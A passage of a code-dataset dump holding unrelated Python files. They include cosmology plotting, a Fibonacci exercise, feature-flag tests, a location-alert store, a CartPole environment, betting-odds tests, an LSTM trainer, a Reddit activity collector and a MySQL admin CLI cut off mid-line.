'EE,r=%3.2f'%r_num)\n\n#ax.loglog(cl_tens['L'], cl_tens['TT'], '-.', label = 'TT,r=%3.2f'%r_num)\n#ax.loglog(cl_tens['L'], cl_tens['TE'], '-.', label = 'TE,r=%3.2f'%r_num)\n#ax.loglog(cl_tens['L'], cl_tens['EE'], '-.', label = 'EE,r=%3.2f'%r_num)\n#ax.loglog(cl_tens['L'], cl_tens['BB'], '-.', label = 'BB,r=%3.2f'%r_num)\n\n#ax.loglog(cl_tens['L'][0:1400], cl_tens['EE'][0:1400]+ cl_scal['EE'][0:1400], '-.', label = 'EE,r=%3.2f'%r_num)\n\n#ax.loglog(cl_tot['L'], cl_tot['TT'], '-.', label = 'TT,r=%3.2f'%r_num)\n#ax.loglog(cl_tot['L'], cl_tot['TE'], '-.', label = 'TE,r=%3.2f'%r_num)\n#ax.loglog(cl_tot['L'], cl_tot['EE'], '-.', label = 'EE,r=%3.2f'%r_num)\n#ax.loglog(cl_tot['L'], cl_tot['BB'], '-.', label = 'BB,r=%3.2f'%r_num)\n\n#ax.loglog(cl_lensed['L'], cl_lensed['EE'], 'b--', lw = 1, label = 'EE,lensed')\nax.loglog(cl_lensed['L'], cl_lensed['BB'], 'b--', lw = 2, label = 'BB,lensed')\n#ax.loglog(cl_tens['L'], cl_tens['EE'], 'r-.', lw = 1, label = 'EE,tensor')\nax.loglog(cl_tens['L'], cl_tens['BB'], 'r-.', lw = 2, label = 'BB,tensor')\nax.loglog(cl_tens_0p01['L'], cl_tens_0p01['BB'], 'r-.', lw = 2, label = 'BB,tensor,r=0.01')\nax.loglog(cl_lensedtot['L'], cl_lensedtot['EE'], 'k-.', lw = 1, label = 'EE,lensedtot')\n#ax.loglog(cl_lensedtot['L'], cl_lensedtot['BB'], 'k-.', lw = 2, label = 'BB,lensedtot')\nax.set_title('r=%3.2f'%r_num)\nax.set_xlabel(r'$l$')\nax.set_ylabel(r'$l(l+1)C_l/(2\\pi) [\\mu\\mathrm{K}^2]$')\nax.legend()\n#if do_lensing == True:\n#\tax.loglog(cl3['L'], cl3['BB'], ':', label = 'BB,r=%3.2f'%r)\t\t\n\t\t\n#fig.savefig('plots/plot_cl_tensor_vs_lensing_Bmodes_r_0.06.pdf')\nfig.savefig('plots/plot_cl_tensor_vs_lensing_Bmodes_reproducing_0.01.pdf')","sub_path":"s2cnn/examples/cosmo/plot_Cl_r.py","file_name":"plot_Cl_r.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"444648219","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 6 11:29:11 2018\r\n\r\nThe Fibonacci sequence is defined by the recurrence relation:\r\n\r\nFn = Fn−1 + Fn−2, where F1 = 1 and F2 = 1.\r\nHence the first 12 terms will be:\r\n\r\nF1 = 1\r\nF2 = 1\r\nF3 = 2\r\nF4 = 3\r\nF5 = 5\r\nF6 = 8\r\nF7 = 13\r\nF8 = 21\r\nF9 = 34\r\nF10 = 55\r\nF11 = 89\r\nF12 = 144\r\nThe 12th term, F12, is the first term to contain three digits.\r\n\r\nWhat is the index of the first term in the Fibonacci sequence to contain 1000 digits?\r\n@author: pallo\r\n\"\"\"\r\n\r\n# Def a fib function\r\ndef fib(n):\r\n a = 1\r\n b = 0\r\n while n > 1:\r\n a, b = a+b, a\r\n n = n - 1\r\n return a\r\n\r\n# find the index of the first term in the Fibonacci sequence to contain 1000 digits\r\ni=0\r\nwhile len(str(fib(i)))<1000:\r\n i = i+1\r\n \r\nprint(i)","sub_path":"ex025.py","file_name":"ex025.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"501551242","text":"def exception_handling():\n try:\n a = 10\n b = 20\n c = 0\n\n d = (a + b)/c\n print(d)\n except:\n print('Exception happend')\n #raise Exception('This is raised')\n else:\n print('Else executed')\n finally:\n print('Finally, always executed')\n\ncars = dict(make = 'hyundai', model = 'sonata', year = 2015)\ndef except_cars():\n try:\n print(cars['color'])\n except:\n # raise Exception('Here is the dictionary exception:')\n print('Exception handled')\n else:\n print('This is else block')\n finally:\n print('Execution finished: this is the finally block')\n\nexception_handling()\nexcept_cars()","sub_path":"Udemy_python_anyone_can_code/Scratch_papers/exceptions_practice.py","file_name":"exceptions_practice.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"225175523","text":"# -*- coding: utf-8 -*-\nimport mock\nfrom pyramid.testing import DummyRequest\nimport pytest\n\nfrom h import features\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef features_override(request):\n patcher = mock.patch.dict('h.features.FEATURES', {\n 'notification': \"A test flag for testing with.\"\n })\n patcher.start()\n request.addfinalizer(patcher.stop)\n\n\ndef test_flag_enabled_raises_for_undocumented_feature():\n request = DummyRequest()\n\n with pytest.raises(features.UnknownFeatureError):\n features.flag_enabled(request, 'wibble')\n\n\ndef test_flag_enabled_looks_up_feature_by_name(feature_model):\n request = DummyRequest()\n\n features.flag_enabled(request, 'notification')\n\n feature_model.get_by_name.assert_called_with('notification')\n\n\ndef test_flag_enabled_false_if_not_in_database(feature_model):\n feature_model.get_by_name.return_value = None\n request = DummyRequest()\n\n result = features.flag_enabled(request, 'notification')\n\n assert not result\n\n\ndef test_flag_enabled_false_if_everyone_false(feature_model):\n request = DummyRequest()\n\n result = features.flag_enabled(request, 'notification')\n\n assert not result\n\n\ndef test_flag_enabled_true_if_everyone_true(feature_model):\n feature_model.get_by_name.return_value.everyone = True\n request = DummyRequest()\n\n result = features.flag_enabled(request, 'notification')\n\n assert result\n\n\ndef test_flag_enabled_false_when_admins_true_normal_request(feature_model):\n feature_model.get_by_name.return_value.admins = True\n request = DummyRequest()\n\n result = features.flag_enabled(request, 'notification')\n\n assert not result\n\n\ndef test_flag_enabled_true_when_admins_true_admin_request(authn_policy,\n feature_model):\n authn_policy.effective_principals.return_value = ['group:__admin__']\n feature_model.get_by_name.return_value.admins = True\n request = DummyRequest()\n\n result = features.flag_enabled(request, 'notification')\n\n assert result\n\n\ndef test_flag_enabled_false_when_staff_true_normal_request(feature_model):\n \"\"\"It should return False for staff features if user is not staff.\n\n If a feature is enabled for staff, and the user is not a staff member,\n flag_enabled() should return False.\n\n \"\"\"\n # The feature is enabled for staff members.\n feature_model.get_by_name.return_value.staff = True\n\n request = DummyRequest()\n\n assert features.flag_enabled(request, 'notification') is False\n\n\ndef test_flag_enabled_true_when_staff_true_staff_request(authn_policy,\n feature_model):\n # The authorized user is a staff member.\n authn_policy.effective_principals.return_value = ['group:__staff__']\n\n # The feature is enabled for staff.\n feature_model.get_by_name.return_value.staff = True\n\n request = DummyRequest()\n\n assert features.flag_enabled(request, 'notification') is True\n\n\n@pytest.fixture\ndef feature_model(request):\n patcher = mock.patch('h.features.Feature', autospec=True)\n request.addfinalizer(patcher.stop)\n model = patcher.start()\n model.get_by_name.return_value.everyone = False\n model.get_by_name.return_value.admins = False\n return model\n","sub_path":"h/test/features_test.py","file_name":"features_test.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"559442405","text":"from pahera.PythonModules import SendSMS_mod\nfrom pahera.PythonModules import ModularisedTracks_mod\nfrom pahera.Utilities import RandomNoGenerator\nfrom datetime import datetime\nimport time\nfrom django.db import connection, transaction\nfrom geopy.geocoders import Nominatim\nfrom pahera.Utilities import DictFetchAll\nfrom pahera.Utilities import WritingToJson\nfrom pahera.models import Person, Tracks, User_login, Trusted_friends, Otp, ViewFriendTracks, ModularisedTracks\n\n# To store the alerts or tracks data sent from the user through app..!!!\ndef store_tracks(track_data):\n authID = RandomNoGenerator.getCode() # Generating random id to apend it to the link..!!!\n # The below link will be sent to the user's trusted friends, added by the user..!!!\n link = \"http://54.254.248.83:8020/pahera/viewfriendtrack/\" + authID +\"/\"\n date_current = time.strftime(\"%Y-%m-%d\")\n time_current = time.strftime(\"%H:%M:%S\")\n geolocator = Nominatim()\n lati = track_data['latitude']\n longi = track_data['longitude']\n latlong = lati, longi\n location = geolocator.reverse(latlong)\n track_data['state'] = location.raw['address']['state']\n # The below try, excepts are because of the city name issue..!!!\n # For some cities the geolocator does'nt have state_district or city or town, so whichever is available that will be stored in the db..!!!\n try: # If State_district exists..!!!\n track_data['state_district'] = location.raw['address']['state_district']\n except KeyError: # If Not..!!!\n try : # If city exists..!!!\n track_data['state_district'] = location.raw['address']['city']\n except KeyError: # If Not..!!!\n try: # If town exists..!!!\n track_data['state_district'] = location.raw['address']['town']\n location.raw['address']['town']\n except: # If Nothing exists..!!!\n track_data['state_district'] = \"others\"\n track_data['country'] = location.raw['address']['country_code']\n track_data['address'] = location.raw['display_name']\n person = Person.objects.get(id = track_data['person'])\n track = Tracks(person = person, latitude = track_data['latitude'], longitude = track_data['longitude'], date = date_current, time = time_current, media_type = track_data['mediaType'], t_type = track_data['t_type'], message = track_data['message'], media_link = link, state_district = track_data['state_district'], state = track_data['state'], country = track_data['country'], address = track_data['address'])\n \n track.save()\n \n # Storing track for the users friend..!!!\n friendTrack = ViewFriendTracks(person = person, latitude = track_data['latitude'], longitude = track_data['longitude'], date = date_current, time = time_current, media_type = track_data['mediaType'], auth_id = authID, message = track_data['message'])\n \n friendTrack.save()\n print(\"Track Added Successfully..!!!\")\n post_new = {}\n post_new['PhoneNo'] = person.phone_no\n dataCheck = {}\n friends_list = {}\n friends_list = Trusted_friends.objects.filter(person = person)\n message_details = {}\n \n message_details['1'] = \"You got new alert from (%s) on %s, at %s. \\n click on link to see the Track. \\n %s\" % (person.first_name, date_current, time_current, link)\n for post in friends_list:\n message = message_details['1']\n # To Do..!!!\n #dataCheck['ph_no'] = .phone_no\n #SendSMS_mod.sendAlert(dataCheck, post_new, message)\n \n # This module is used to store the tracks in a proper format based on,\\ country, state, cities..!!!\n ModularisedTracks_mod.insertTrack(track_data, date_current, time_current, location)\n","sub_path":"pahera/PythonModules/StoreTrack_mod.py","file_name":"StoreTrack_mod.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"101233015","text":"import numpy as np\nimport math\n\nfrom gym.envs.classic_control.cartpole import CartPoleEnv\n\nclass CartPoleVTEnv(CartPoleEnv):\n\tdef __init__(self, task = {}):\n\t\tsuper(CartPoleVTEnv, self).__init__()\n\t\tself.task = task\n\t\tself.force_mag = task.get('force_mag', 10)\n\n\tdef sample_tasks(self, num_tasks, sampling_type, points_per_dim=-1):\n\t\tif sampling_type == 'rand':\n\t\t\tforce_mags = self.np_random.uniform(7.5, 22.5, size=(num_tasks,))\n\n\t\t\ttasks = [{'force_mag': force_mag} for force_mag in force_mags]\n\t\telif sampling_type == 'uni':\n\t\t\tassert int(num_tasks) == int(points_per_dim), 'Number of tasks(mbs) should match the points per dimension if using `uni`'\n\t\t\tforce_mags = np.linspace(7.5, 22.5, num=points_per_dim)\n\t\t\t\n\t\t\ttasks = [{'force_mag': force_mag} for force_mag in force_mags]\n\t\telif sampling_type == 'unirand':\n\t\t\tassert int(num_tasks) == int(points_per_dim), 'Number of tasks(mbs) should match the points per dimension if using `unirand`'\n\t\t\tforce_mags, fm_step = np.linspace(7.5, 22.5, endpoint=False, retstep=True, num=points_per_dim)\n\t\t\tforce_mags = force_mags + np.random.uniform(0, fm_step, size=force_mags.shape)\n\n\t\t\ttasks = [{'force_mag': force_mag} for force_mag in force_mags]\n\t\telse:\n\t\t\tassert False, 'Sampling Type should be `uni` or `rand` or `unirand`. Given: ' + sampling_type\n\t\treturn tasks\n\n\tdef reset_task(self, task):\n\t\tself.task = task\n\t\tself.force_mag = task['force_mag']\n\t\treturn\n\n\tdef reset(self):\n\t\tself.state = super(CartPoleVTEnv, self).reset().astype(np.float32).flatten()\n\t\treturn self.state\n\n\tdef step(self, action):\n\t\tstate, reward, done, _ = super(CartPoleVTEnv, self).step(action)\n\t\tself.state = state.astype(np.float32).flatten()\n\t\treturn self.state, reward, done, {}","sub_path":"maml_rl/envs/variable_tasks/cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"579859798","text":"\n\nfrom xai.brain.wordbase.nouns._infield import _INFIELD\n\n#calss header\nclass _INFIELDS(_INFIELD, ):\n\tdef __init__(self,): \n\t\t_INFIELD.__init__(self)\n\t\tself.name = \"INFIELDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"infield\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_infields.py","file_name":"_infields.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"150972478","text":"from pysbr.config.sport import NFL, NCAAF, ATP\nfrom datetime import datetime\n\n\nclass TestIntegration:\n def test_last_year_group_nfl(\n self,\n events_by_date,\n event_groups_by_league,\n events_by_event_group,\n current_lines,\n ):\n dt = datetime.strptime(\"2019-09-05\", \"%Y-%m-%d\")\n nfl = NFL()\n league_id = nfl.league_id\n\n # get last year season by using events by date\n e1 = events_by_date(league_id, dt, \"integration_test_last_year_group_nfl1\")\n e1list = e1.list()\n season_id = e1list[0].get(\"season id\")\n\n # get season's event groups\n e2 = event_groups_by_league(league_id, \"integration_test_last_year_group_nfl2\")\n e2list = e2.list()\n\n # get week 10\n week10_id = [\n x.get(\"event group id\") for x in e2list if x.get(\"alias\") == \"Week 10\"\n ].pop()\n\n market_id = nfl.market_ids(\"1hou\")[0]\n e3 = events_by_event_group(\n league_id,\n week10_id,\n season_id,\n market_id,\n \"integration_test_last_year_group_nfl3\",\n )\n\n cl = current_lines(\n e3.ids(), [market_id], [20], \"integration_test_last_year_group_nfl4\"\n )\n df = cl.dataframe(e3)\n assert df is not None\n\n def test_team_lines_ncaaf(self, events_by_participants, best_lines):\n ncaaf = NCAAF()\n lid = ncaaf.league_id\n spid = ncaaf.sport_id\n bama = ncaaf.team_ids([\"alabama\"])\n\n sdt = datetime.strptime(\"2019-09-05\", \"%Y-%m-%d\")\n edt = datetime.strptime(\"2019-10-30\", \"%Y-%m-%d\")\n\n e = events_by_participants(\n bama,\n sdt,\n edt,\n lid,\n spid,\n \"integration_test_team_lines_ncaaf1\",\n \"integration_test_team_lines_ncaaf2\",\n )\n\n market_ids = ncaaf.market_ids([\"fgps\", \"ml\"])\n b = best_lines(e.ids(), market_ids, \"integration_test_team_lines_ncaaf3\")\n df = b.dataframe(e)\n assert df is not None\n\n def test_rivalry_nfl(self, events_by_matchup, opening_lines):\n nfl = NFL()\n ids = nfl.team_ids([\"chicago\", \"packers\"])\n market_ids = nfl.market_ids([\"1qou\", \"4qml\", \"2qml\", \"2hps\"])\n e = events_by_matchup(ids[0], ids[1], 10, \"integration_test_rivalry_nfl1\")\n o = opening_lines(e.ids(), market_ids, 20, \"integration_test_rivalry_nfl2\")\n\n df = o.dataframe(e)\n assert df is not None\n\n def test_search_atp(\n self,\n search_events,\n events_by_participants_recent,\n current_lines,\n ):\n # This test will fail if querying server if Nadal does not have any upcoming\n # events.\n e = search_events(\"Nadal\", \"integration_test_search_atp1\")\n\n nadal = None\n for x in e.list():\n for y in x.get(\"participants\"):\n try:\n if y[\"source\"][\"last name\"] == \"Nadal\":\n\n nadal = y[\"participant id\"]\n except KeyError:\n pass\n\n e2 = None\n if nadal is not None:\n e2 = events_by_participants_recent([nadal], \"integration_test_search_atp2\")\n\n df = e2.dataframe()\n\n atp = ATP()\n market_ids = atp.market_ids([\"ou\", \"ps\", \"ml\"])\n\n c = current_lines(\n e2.ids(), market_ids, [5, 20, 9], \"integration_test_search_atp3\"\n )\n df = c.dataframe(e2)\n\n assert df is not None\n\n def test_epl(\n self,\n search_leagues,\n league_hierarchy,\n events_by_date,\n league_markets,\n current_lines,\n ):\n # 'epl' fails\n s = search_leagues(\"premier league\", \"integration_test_epl1\")\n\n assert s is not None\n\n league_id = 2\n # sport_id = 2\n\n # league hierarchy is empty for EPL!\n lh = league_hierarchy(league_id, \"integration_test_epl2\")\n df = lh.dataframe()\n\n dt = datetime.strptime(\"2020-11-21\", \"%Y-%m-%d\")\n e = events_by_date(league_id, dt, \"integration_test_epl3\")\n\n # lm = league_markets(2, \"integration_test_epl4\")\n\n # I got these from inspecting in Chrome, league_markets returns too many\n market_ids = [1, 395, 396]\n c = current_lines(e.ids(), market_ids, 20, \"integration_test_epl5\")\n\n df = c.dataframe(e)\n assert df is not None\n\n\n# try and get odds for the election\n#\n#\n# try horse racing\n\n# get odds for jake paul vs nate robinson - do line history\n#\n","sub_path":"tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20804878","text":"import re\nimport click\nimport os\nfrom shub import auth\nfrom shub.click_utils import log\nfrom six.moves import input\n\n\n@click.command(help='add Scrapinghug API key into the netrc file')\n@click.pass_context\ndef cli(context):\n if auth.get_key_netrc():\n log(\"You're already logged in. To change credentials, use 'shub logout' first.\")\n return 0\n\n cfg_key = _find_cfg_key()\n key = _prompt_for_key(suggestion=cfg_key)\n\n if not key and is_valid_key(cfg_key):\n auth.write_key_netrc(cfg_key)\n elif key and is_valid_key(key):\n auth.write_key_netrc(key)\n else:\n context.fail('Invalid key. Tip: your key must have 32 characters.')\n log('Success.')\n\n\ndef is_valid_key(key):\n return bool(re.match(r'[A-Fa-f\\d]{32}$', key))\n\n\ndef _prompt_for_key(suggestion):\n suggestion_txt = ''\n if suggestion:\n suggestion_txt = '(%s) ' % suggestion\n\n prompt = 'Insert your Scrapinghub API key %s: ' % suggestion_txt\n return input(prompt)\n\n\ndef _find_cfg_key():\n cfg_key = _read_scrapy_cfg_key()\n if cfg_key:\n return cfg_key\n\n envkey = os.getenv(\"SHUB_APIKEY\")\n if envkey:\n return envkey\n\ndef _read_scrapy_cfg_key():\n try:\n from scrapy.utils.conf import get_config\n cfg = get_config()\n\n if cfg.has_section('deploy'):\n deploy = dict(cfg.items('deploy'))\n key = deploy.get('username')\n\n if key:\n return key\n except:\n return\n","sub_path":"shub/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"521891001","text":"#!/usr/bin/env python\n\n\"\"\"\nThis script takes an event log in csv format and trains an LSTM model for predicting the next event in a case.\n\nAuthor: Irene Teinemaa\n\"\"\"\n\nfrom keras.models import Sequential\nimport numpy as np\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.callbacks import ModelCheckpoint\n\n\n# path to the input dataset\ninput_filename = \"event_log.csv\"\n\n# path where the LSTM models (checkpoints) are saved\ncheckpoint_filepath = \"model_weights.{epoch:02d}-{val_loss:.2f}.hdf5\"\n\n# LSTM parameters\nlstmsize = 48\ndropout = 0.2\noptim = 'rmsprop'\nactivation = 'softmax'\nloss = 'categorical_crossentropy'\nnb_epoch = 10\nbatch_size = 64\nvalidation_ratio = 0.2\n\n# relevant column names\nactivity_col = \"Activity\"\ncase_id_col = \"Case ID\"\ntimestamp_col = \"Complete Timestamp\"\n\n\n# read the dataset\ndata = pd.read_csv(input_filename, sep=\";\")\ndata[timestamp_col] = pd.to_datetime(data[timestamp_col])\n\n# one-hot encode the activity\ncat_data = pd.get_dummies(data[[activity_col]])\ndt_final = pd.concat([data[[case_id_col, timestamp_col]], cat_data], axis=1).fillna(0)\n\n# add dummy columns for case start and case end\ndt_final[\"START\"] = 0\ndt_final[\"END\"] = 0\n\n# assign model dimensions\ngrouped = dt_final.groupby(case_id_col)\nmax_events = grouped.size().max() # maximum case length\ndata_dim = dt_final.shape[1] - 2 # our input dataset will contain columns for each activity type, including the dummy start and end activities. We are excluding timestamp and case_id, therefore -2\ntime_dim = max_events + 1 # +1 comes from adding the artificial start points. We are not considering the end points here, because the LSTM input is one less than the case length (the last training sample for a case predicts the end event)\n\n# generate one-hot vectors representing the dummy endpoints\nstart = np.zeros(data_dim, dtype=int)\nstart[-2] = 1\nend = np.zeros(data_dim, dtype=int)\nend[-1] = 1\n\nprint('Constructing LSTM input data...')\nX = np.zeros((len(dt_final)+len(grouped), time_dim, data_dim))\ny = np.zeros((len(dt_final)+len(grouped), data_dim))\ncase_idx = 0\nfor name, group in grouped:\n group = group.sort_values(timestamp_col, ascending=True, kind=\"mergesort\").as_matrix()[:,2:]\n # adding the artificial start and end-points to the case\n group = np.vstack([start, group, end])\n # generate training samples for each prefix of the case, where LSTM input is the prefix and prediction target is the next event\n for i in range(1, len(group)):\n X[case_idx] = pad_sequences(group[np.newaxis,:i,:], maxlen=time_dim)\n y[case_idx] = group[i,:]\n case_idx += 1\n \nprint('Building model...')\nmodel = Sequential()\nmodel.add(LSTM(lstmsize, input_shape=(time_dim, data_dim)))\nmodel.add(Dropout(dropout))\nmodel.add(Dense(data_dim, activation=activation))\n \nprint('Compiling model...')\nmodel.compile(loss=loss, optimizer=optim)\n\nprint(\"Training...\")\ncheckpointer = ModelCheckpoint(filepath=checkpoint_filepath, verbose=1, save_best_only=True, save_weights_only=True)\nmodel.fit(X, y, nb_epoch=nb_epoch, batch_size=batch_size, verbose=2, validation_split=validation_ratio, callbacks=[checkpointer])\nprint(\"Done.\")\n","sub_path":"train_LSTM_next_event.py","file_name":"train_LSTM_next_event.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"597007618","text":"import pandas\nfrom praw import Reddit\nfrom prawcore import exceptions\nfrom praw.models import Submission, Comment, Redditor\n\nimport config\nfrom content_parsing import parse_submission, parse_comment\nfrom exactly_once_queue import exactlyOnceQueue\n\n\ndef reddit_activity(username: str):\n \"\"\"Requests comment and submission data for the given user and any other users they have interacted with.\n Interactions between users are when the given user has replied to a submission or comment by another user.\n Writes data to out/{username}.csv.\n \"\"\"\n reddit = Reddit(client_id=config.client_id,\n client_secret=config.client_secret,\n user_agent=config.user_agent)\n\n # Build queue of users to collect activity of: provided user and users they have interacted via replying\n # Also append users who have interacted with provided user (they replied to a post/comment)\n users = exactlyOnceQueue()\n users.append(username)\n redditor = Redditor(reddit, name=username)\n\n for comment in redditor.comments.new():\n if comment.parent().author:\n users.append(str(comment.parent().author))\n # Add users who have replied to this comment\n for reply in comment.replies:\n if reply.author:\n users.append(str(reply.author))\n\n\n for submission in redditor.submissions.new():\n # Add users who have replied to this submission\n for reply in submission.comments:\n if reply.author:\n users.append(str(reply.author))\n\n\n\n # Get comment and submission data of each user and append to list\n data = []\n print(f'users to process:{str(len(users))}')\n while len(users) > 0:\n redditor = Redditor(reddit, name=users.pop()) # type: Redditor\n try:\n for submission in redditor.submissions.new(): # type: Submission\n row = parse_submission(submission)\n data.append(row)\n for comment in redditor.comments.new(): # type: Comment\n row = parse_comment(comment)\n data.append(row)\n except exceptions.NotFound:\n print(f'Exception occured on user {str(redditor)}')\n except exceptions.Forbidden:\n print(f'Exception occured on user {str(redditor)}')\n print(f'user complete, remaining = {str(len(users))}')\n\n # Construct DataFrame from list and write to CSV\n df = pandas.DataFrame(data=data, columns=['id', 'author', 'date', 'subreddit', 'replyingTo', 'polarity', 'subjectivity', 'replyCount'])\n df.set_index('id', inplace=True)\n df.to_csv(f'out/{username}.csv')","sub_path":"data/reddit_activity.py","file_name":"reddit_activity.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254554514","text":"import subprocess as sp\nfrom sys import executable\n# from subprocess import Popen, CREATE_NEW_CONSOLE\nimport pymysql\nfrom prettytable import PrettyTable\n\n# Popen([executable, 'script.py'], creationflags=CREATE_NEW_CONSOLE)\n\n# input('Enter to exit from this launcher script...')\n\ndef display(table_name):\n query = \"SELECT * FROM {}\".format(str(table_name))\n cursor.execute(query)\n\n row = cursor.fetchone()\n t = PrettyTable(list(row))\n while row is not None:\n row = cursor.fetchone() \n t.add_row(list(row))\n\n# ---- ADMIN START -----\n\n## ---- AUDIT START ----\n\ndef add_audit():\n name = input(\"Enter Agency Name: \") \n query = \"INSERT INTO AUDIT_AGENCY (NAME) VALUES (%s)\"\n try:\n cursor.execute(query, (name))\n db.commit()\n except:\n print(\"Error: Check value and try again\")\n\ndef delete_audit():\n ID = int(input(\"Enter Agency ID: \"))\n try:\n query = \"DELETE FROM AUDIT_AGENCY WHERE ID = %s\"\n cursor.execute(query, (ID))\n db.commit()\n except:\n print(\"Error: Check ID again and try again\")\n\ndef update_audit():\n name = input(\"Enter Agency Name: \") \n ID = int(input(\"Enter Agency ID to be updated: \"))\n try:\n query = \"UPDATE AUDIT_AGENCY SET NAME = %s WHERE ID = %s\"\n cursor.execute(query, (name, ID))\n db.commit()\n except:\n print(\"Error: Check ID again and try again\")\n\ndef audit():\n print(\"1. View All\")\n print(\"2. Insert\")\n print(\"3. Delete\")\n print(\"4. Update\")\n print(\"5. Quit\")\n ch = int(input(\"Enter choice :> \"))\n if ch is 5:\n return\n elif ch>=6 or ch<1:\n print(\"Error: Option does not exist.\")\n else:\n if ch is 1:\n display(\"AUDIT_AGENCY\")\n elif ch is 2:\n add_audit()\n elif ch is 3:\n delete_audit()\n elif ch is 4:\n update_audit()\n\n## ----- AUDIT END -----\n## ----- PURCHASER START -----\n\ndef add_purchaser():\n name = input(\"Enter Purchaser Name: \") \n try:\n query = \"INSERT INTO PURCHASER (NAME) VALUES (%s)\"\n cursor.execute(query, (name))\n db.commit()\n except:\n print(\"Error.\")\n\ndef delete_purchaser():\n ID = int(input(\"Enter Purchaser ID: \"))\n try:\n query = \"DELETE FROM PURCHASER WHERE ID = %s\"\n cursor.execute(query, (ID))\n db.commit()\n except:\n print(\"Error.\")\n\ndef update_purchaser():\n name = input(\"Enter Purchaser Name: \") \n ID = int(input(\"Enter Purchaser ID to be updated: \"))\n try:\n query = \"UPDATE PURCHASER SET NAME = %s WHERE ID = %s\"\n cursor.execute(query, (name, ID))\n db.commit()\n except:\n print(\"Error: Check ID again and try again\")\n\ndef purchaser():\n\n print(\"1. View All\")\n print(\"2. Insert\")\n print(\"3. Delete\")\n print(\"4. Update\")\n print(\"5. Quit\")\n ch = int(input(\"Enter choice :> \"))\n tmp = sp.call('clear',shell=True)\n if ch is 5:\n return\n elif ch>=6 or ch<1:\n print(\"Error: Option does not exist.\")\n else:\n if ch is 1:\n display(\"PURCHASER\")\n elif ch is 2:\n add_purchaser()\n elif ch is 3:\n delete_purchaser()\n elif ch is 4:\n update_purchaser()\n\n## ---- PURCHASER END ------\n## ---- COMPANY START ------\n\ndef add_company():\n name = input(\"Enter Manufacturer Name: \") \n query = \"INSERT INTO COMPANY (NAME) VALUES (%s)\"\n try:\n cursor.execute(query, (name))\n db.commit()\n except:\n print(\"Error\")\n\ndef delete_company():\n ID = int(input(\"Enter Company ID: \"))\n query = \"DELETE FROM COMPANY WHERE ID = %s\"\n try:\n cursor.execute(query, (ID))\n db.commit()\n except:\n print(\"Error\")\n\ndef update_company():\n name = input(\"Enter Company Name: \") \n ID = int(input(\"Enter Company ID to be updated: \"))\n try:\n query = \"UPDATE COMPANY SET NAME = %s WHERE ID = %s\"\n cursor.execute(query, (name, ID))\n db.commit()\n except:\n print(\"Error: Check ID again and try again\")\n\ndef company():\n print(\"1. View All\")\n print(\"2. Insert\")\n print(\"3. Delete\")\n print(\"4. Update\")\n print(\"5. Quit\")\n ch = int(input(\"Enter choice :> \"))\n tmp = sp.call('clear',shell=True)\n if ch is 5:\n return\n elif ch>=6 or ch<1:\n print(\"Error: Option does not exist.\")\n else:\n if ch is 1:\n display(\"COMPANY\")\n elif ch is 2:\n add_company()\n elif ch is 3:\n delete_company()\n elif ch is 4:\n update_company()\n\n## ---- COMPANY END --------\n## ---- PARTS START --------\n\ndef add_parts():\n\tman_name = input(\"Enter Manufacturer Name: \") \n\tpart_name = input(\"Enter Part Name: \")\n\tclassification = input(\"Enter Type of Part: \")\n\n\ttry:\n\t\tif classification == \"Engine\" or classification == \"engine\":\n\t\t\tquery = \"SELECT EXISTS(SELECT * FROM ENGINE WHERE %s IN (SELECT NAME FROM ENGINE))\"\n\t\t\tcursor.execute(query, (part_name))\n\t\t\trow = cursor.fetchone()\n\t\t\t\n\t\t\tif row[0] == 1:\n\t\t\t\tprint(\"Part Already Exists\")\n\t\t\telse:\n\t\t\t\tquery = \"SELECT EXISTS(SELECT * FROM COMPANY WHERE %s IN (SELECT NAME FROM COMPANY))\"\t\t\t\t\t\t\n\t\t\t\tcursor.execute(query, (man_name))\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\t\n\t\t\t\tif row[0] == 0:\n\t\t\t\t\tadd_company(man_name)\n\n\t\t\t\tquery = \"SELECT ID FROM COMPANY WHERE NAME = %s\"\n\t\t\t\tcursor.execute(query, (man_name))\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\tman_id = row[0]\n\n\t\t\t\tcost = int(input(\"Enter Cost of part: \"))\n\t\t\t\tpower = int(input(\"Enter Power of Engine: \"))\n\t\t\t\tclassification = input(\"Enter Type of Engine: \")\n\t\t\t\t\n\t\t\t\tquery = \"INSERT INTO PARTS (MANUFACTURER_ID,COST) VALUES (%s,%s)\"\n\t\t\t\tprint(\"Manufacturer id 